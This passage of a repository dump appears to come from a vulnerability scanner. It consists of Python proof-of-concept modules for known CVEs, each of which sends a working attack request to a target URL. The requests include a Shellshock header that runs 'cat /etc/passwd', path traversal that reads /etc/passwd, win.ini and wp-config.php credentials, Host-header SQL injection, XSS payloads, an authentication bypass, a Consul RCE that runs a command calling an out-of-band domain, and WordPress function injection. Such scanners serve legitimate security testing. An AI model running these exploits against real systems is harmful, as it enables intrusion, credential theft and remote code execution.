"https://twitter.com/chybeta/status/1353974652540882944", 13 | "https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["shellshock", "sonicwall", "rce", "vpn"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/cgi-bin/jarrewrite.sh""" 40 | method = "GET" 41 | data = """""" 42 | headers = {'User-Agent': '"() { :; }; echo ; /bin/bash -c \'cat /etc/passwd\'"', 'Accept': '*/*'} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if (re.search(r"""root:.*:0:0""",resp0.text)) and (resp0.status_code == 200): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-5461.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | 4 | 5 | # Vuln Base Info 6 | def info(): 7 | return { 8 | "author": "cckuailong", 9 | "name": '''StageShow <= 5.0.8 - Open Redirect''', 10 | "description": '''Open redirect vulnerability in the Redirect function in stageshow_redirect.php in the StageShow plugin before 5.0.9 for WordPress allows remote attackers to 
redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.''', 11 | "severity": "medium", 12 | "references": [ 13 | "https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2015-5461" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["redirect", "cve", "cve2015", "wordpress", "wp-plugin"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and re.search(r'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$', str(resp.headers)): 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-9414.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)''', 9 | "description": '''The wp-symposium plugin through 15.8.1 
for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2015-9414" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 17 | "cvss-score": "6.1", 18 | "cve-id": "CVE-2015-9414", 19 | "cwe-id": "CWE-79" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "wordpress", "wp-plugin", "xss"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2018/CVE-2018-7467.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''AxxonSoft Axxon Next Directory Traversal''', 9 | "description": '''AxxonSoft Axxon Next suffers from a 
directory traversal vulnerability.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2018-7467" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2018-7467", 19 | "cwe-id": "CWE-200" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2018", "axxonsoft", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """//css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini""" 40 | method = "GET" 41 | data = """""" 42 | headers = {} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if ("""bit app support""" in resp0.text and """fonts""" in resp0.text and """extensions""" in resp0.text): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-2323.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Lighttpd 1.4.34 SQL Injection and Path 
Traversal''', 9 | "description": '''A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname).''', 10 | "severity": "critical", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2014-2323", 13 | "https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt", 14 | "http://www.lighttpd.net/2014/3/12/1.4.35/" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 18 | "cvss-score": "9.8", 19 | "cve-id": "CVE-2014-2323", 20 | "cwe-id": "CWE-89" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2014", "sqli", "lighttpd", "injection"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/etc/passwd' 40 | headers = { 41 | "Host": "[::1]' UNION SELECT '/" 42 | } 43 | 44 | resp = requests.get(url+path, headers=headers, timeout=10, verify=False, allow_redirects=False) 45 | if resp.status_code == 200 and "root:" in resp.text: 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-8799.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 
| "name": '''WordPress Plugin DukaPress 2.5.2 - Directory Traversal''', 9 | "description": '''A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2014-8799", 13 | "https://www.exploit-db.com/exploits/35346", 14 | "https://www.cvedetails.com/cve/CVE-2014-8799" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "CVE-2014-8799", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2014", "wordpress", "wp-plugin", "lfi"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and "DB_NAME" in resp.text and "DB_USER" in resp.text and "DB_PASSWORD" in resp.text: 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-9607.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 
4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Netsweeper 4.0.4 - Cross-Site Scripting''', 9 | "description": '''A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2014-9607" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 17 | "cvss-score": "6.1", 18 | "cve-id": "CVE-2014-9607", 19 | "cwe-id": "CWE-79" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2014", "netsweeper", "xss"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-9609.py: 
-------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Netsweeper 4.0.8 - Directory Traversal''', 9 | "description": '''A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2014-9609" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", 17 | "cvss-score": "5.3", 18 | "cve-id": "CVE-2014-9609", 19 | "cwe-id": "CWE-22" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2014", "netsweeper", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url 
-------------------------------------------------------------------------------- /modules/cves/2018/CVE-2018-8715.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''AppWeb Authentication Bypass vulnerability''', 9 | "description": '''The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://github.com/embedthis/appweb/issues/610" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2018-8715", 18 | "cwe-id": "CWE-287" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2018", "appweb", "auth-bypass"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/""" 39 | method = "GET" 40 | data = """""" 41 | headers = {'Authorization': 'Digest username=admin'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (resp0.status_code == 200) and ("""""" in resp0.text): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = 
url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/yishaadmin-lfi.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''yishaadmin path traversal''', 9 | "description": '''An endpoint in yshaadmin "/admin/File/DownloadFile" was improperly secured, allowing for files to be downloaded, read or deleted without any authentication.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://huntr.dev/bounties/2acdd87a-12bd-4ce4-994b-0081eb908128/", 13 | "https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Util/YiSha.Util/FileHelper.cs#L181-L186" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["lfi", "yishaadmin"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0""" 40 | method = "GET" 41 | data = """""" 42 | headers = {} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if (re.search(r"""root:.*:0:0""",resp0.text)) and (resp0.status_code == 200): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') 
or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-9617.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | 4 | 5 | # Vuln Base Info 6 | def info(): 7 | return { 8 | "author": "cckuailong", 9 | "name": '''Netsweeper 3.0.6 - Open Redirection''', 10 | "description": '''An open redirect vulnerability in remotereporter/load_logfiles.php in Netsweeper before 4.0.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.''', 11 | "severity": "medium", 12 | "references": [ 13 | "https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2014-9617" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 18 | "cvss-score": "6.1", 19 | "cve-id": "CVE-2014-9617", 20 | "cwe-id": "CWE-601" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2014", "netsweeper", "redirect"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if "Location" in resp.headers and re.search(r'(?m)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$', resp.headers['Location']): 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # 
Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-2068.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Magento Server Magmi Plugin - Cross Site Scripting''', 9 | "description": '''Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/35996", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2015-2068" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "magento", "magmi", "xss", "plugin"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | 
def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2022/CVE-2022-0218.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting''', 9 | "description": '''WordPress Email Template Designer WP HTML Mail allows stored cross-site scripting through an unprotected REST-API endpoint.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/", 13 | "https://wordpress.org/plugins/wp-html-mail/", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2022-0218" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 18 | "cvss-score": "6.1", 19 | "cve-id": "CVE-2022-0218", 20 | "cwe-id": "CWE-79" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["wordpress", "wp-plugin", "xss", "cve", "cve2022"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/index.php?rest_route=/whm/v3/themesettings' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and '"background":' in resp.text and '"footer":' in resp.text and "application/json" in str(resp.headers): 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] 
= False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/hashicorp-consul-rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from plugins.oob import verify_request, gen_oob_domain 3 | 4 | 5 | 6 | # Vuln Base Info 7 | def info(): 8 | return { 9 | "author": "cckuailong", 10 | "name": '''Hashicorp Consul Services Api RCE''', 11 | "description": '''''', 12 | "severity": "critical", 13 | "references": [ 14 | "https://www.exploit-db.com/exploits/46074" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["hashicorp", "rce", "oast", "intrusive"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | 40 | oob_domain,flag = gen_oob_domain() 41 | 42 | path = """/v1/agent/service/register""" 43 | method = "PUT" 44 | data = """{ 45 | "ID": "{{randstr}}", 46 | "Name": "{{randstr}}", 47 | "Address": "127.0.0.1", 48 | "Port": 80, 49 | "check": { 50 | "script": "nslookup {oob_domain}", 51 | "interval": "10s", 52 | "Timeout": "86400s" 53 | } 54 | }""".format(oob_domain=oob_domain) 55 | headers = {} 56 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 57 | 58 | if verify_request(type="dns", flag=flag): 59 | result["success"] = True 60 | result["info"] = info() 61 | 
result["payload"] = url+path 62 | 63 | except: 64 | result["success"] = False 65 | 66 | return result 67 | 68 | 69 | # Exploit, can be same with poc() 70 | def exp(url): 71 | return poc(url) 72 | 73 | 74 | # Utils 75 | def format_url(url): 76 | url = url.strip() 77 | if not ( url.startswith('http://') or url.startswith('https://') ): 78 | url = 'http://' + url 79 | url = url.rstrip('/') 80 | 81 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/wordpress/wp-multiple-theme-ssrf.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WordPress Multiple Themes - Unauthenticated Function Injection''', 9 | "description": '''''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/49327", 13 | "https://wpscan.com/vulnerability/10417" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["wordpress", "rce", "ssrf"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/wp-admin/admin-ajax.php?action=action_name""" 40 | method = "POST" 41 | data = """action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com""" 42 | headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if ("""Example Domain""" in resp0.text and """protocol_version""" in resp0.text) and (resp0.status_code 
== 200): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-4544.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Podcast Channels < 0.28 - Unauthenticated Reflected Cross-Site Scripting''', 9 | "description": '''The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2014-4544" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 17 | 